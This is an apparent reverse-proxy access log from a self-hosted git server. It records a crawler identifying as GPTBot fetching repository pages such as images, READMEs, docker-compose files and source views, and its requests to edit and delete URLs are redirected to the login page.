"/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old" +[17/Feb/2026:15:38:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:38:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:38:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" +[17/Feb/2026:15:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/favicon.ico" +[17/Feb/2026:15:38:23 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" +[17/Feb/2026:15:38:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/assets/images/favicon.ico" +[17/Feb/2026:15:38:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:38:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 18632] [Gzip 6.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 877] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:38:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 908] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" +[17/Feb/2026:15:38:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" +[17/Feb/2026:15:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:38:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom4.png" +[17/Feb/2026:15:38:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10863] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:38:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10860] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:38:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:38:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:38:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/html/assets/images/honeywell-logo.svg" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:38:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/html/assets/images/honeywell-logo.svg" +[17/Feb/2026:15:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10867] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:38:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png?display=rendered" [Client 74.7.227.38] [Length 10859] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom5.png" +[17/Feb/2026:15:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:38:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png?display=rendered" [Client 74.7.227.38] [Length 10864] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/ControlRoom3.png" +[17/Feb/2026:15:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10862] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:38:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png?display=rendered" [Client 74.7.227.38] [Length 10861] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom1.png" +[17/Feb/2026:15:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png?display=rendered" [Client 74.7.227.38] [Length 10868] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom2.png" +[17/Feb/2026:15:38:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png?display=rendered" [Client 74.7.227.38] [Length 10869] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom6.png" +[17/Feb/2026:15:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" +[17/Feb/2026:15:38:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py?display=rendered" [Client 74.7.227.38] [Length 10981] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/app/calculator.py" +[17/Feb/2026:15:38:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fstatus.json" [Client 74.7.227.38] [Length 19764] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/status.json" +[17/Feb/2026:15:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md?display=source" [Client 74.7.227.38] [Length 11757] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" +[17/Feb/2026:15:38:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md?display=source" [Client 74.7.227.38] [Length 11758] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" +[17/Feb/2026:15:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11322] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" +[17/Feb/2026:15:38:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md?display=rendered" [Client 74.7.227.38] [Length 11321] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/README.md" +[17/Feb/2026:15:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs?display=source" [Client 74.7.227.38] [Length 11343] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/TestService/Program.cs" +[17/Feb/2026:15:38:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12567] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" +[17/Feb/2026:15:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10832] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/docker-compose.yml" +[17/Feb/2026:15:38:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py?display=source" [Client 74.7.227.38] [Length 12935] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" +[17/Feb/2026:15:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/docker-compose.yml" +[17/Feb/2026:15:38:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10865] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/docker-compose.yml" +[17/Feb/2026:15:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10805] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" +[17/Feb/2026:15:38:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 11831] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/docker-compose.yml" +[17/Feb/2026:15:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 10894] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" +[17/Feb/2026:15:38:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10808] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/update_status.py" +[17/Feb/2026:15:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12597] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/docker-compose.yml" +[17/Feb/2026:15:38:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" +[17/Feb/2026:15:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13937] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" +[17/Feb/2026:15:38:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" +[17/Feb/2026:15:38:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" +[17/Feb/2026:15:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14823] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" +[17/Feb/2026:15:38:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 